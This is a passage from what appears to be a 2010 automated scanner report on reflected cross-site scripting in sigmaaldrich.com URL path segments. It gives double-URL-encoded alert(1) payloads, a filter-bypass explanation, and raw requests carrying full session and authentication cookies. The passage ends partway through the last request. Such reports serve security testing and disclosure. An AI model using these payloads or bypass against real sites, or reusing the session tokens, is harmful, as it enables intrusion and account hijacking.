Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:41 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operations35457";alert(1)//f3cf851a95a","E404") ;
   </script>
...[SNIP]...

1.178. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d98b%2522%253balert%25281%2529%252f%252ff50fafc3009 was submitted in the REST URL parameter 1. This input was echoed as 8d98b";alert(1)//f50fafc3009 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content8d98b%2522%253balert%25281%2529%252f%252ff50fafc3009/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content8d98b";alert(1)//f50fafc3009/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.179. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6fee%2522%253balert%25281%2529%252f%252fcc4a4981ad8 was submitted in the REST URL parameter 2. This input was echoed as e6fee";alert(1)//cc4a4981ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldriche6fee%2522%253balert%25281%2529%252f%252fcc4a4981ad8/customer-support/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche6fee";alert(1)//cc4a4981ad8/customer-support/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.180. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4197%2522%253balert%25281%2529%252f%252f2e03a9fdba0 was submitted in the REST URL parameter 3. This input was echoed as c4197";alert(1)//2e03a9fdba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportc4197%2522%253balert%25281%2529%252f%252f2e03a9fdba0/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportc4197";alert(1)//2e03a9fdba0/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.181. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c73%2522%253balert%25281%2529%252f%252fd11d6131daa was submitted in the REST URL parameter 4. This input was echoed as 82c73";alert(1)//d11d6131daa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service82c73%2522%253balert%25281%2529%252f%252fd11d6131daa/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service82c73";alert(1)//d11d6131daa/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.182. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d593c%2522%253balert%25281%2529%252f%252fd73e4680211 was submitted in the REST URL parameter 5. This input was echoed as d593c";alert(1)//d73e4680211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesd593c%2522%253balert%25281%2529%252f%252fd73e4680211/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
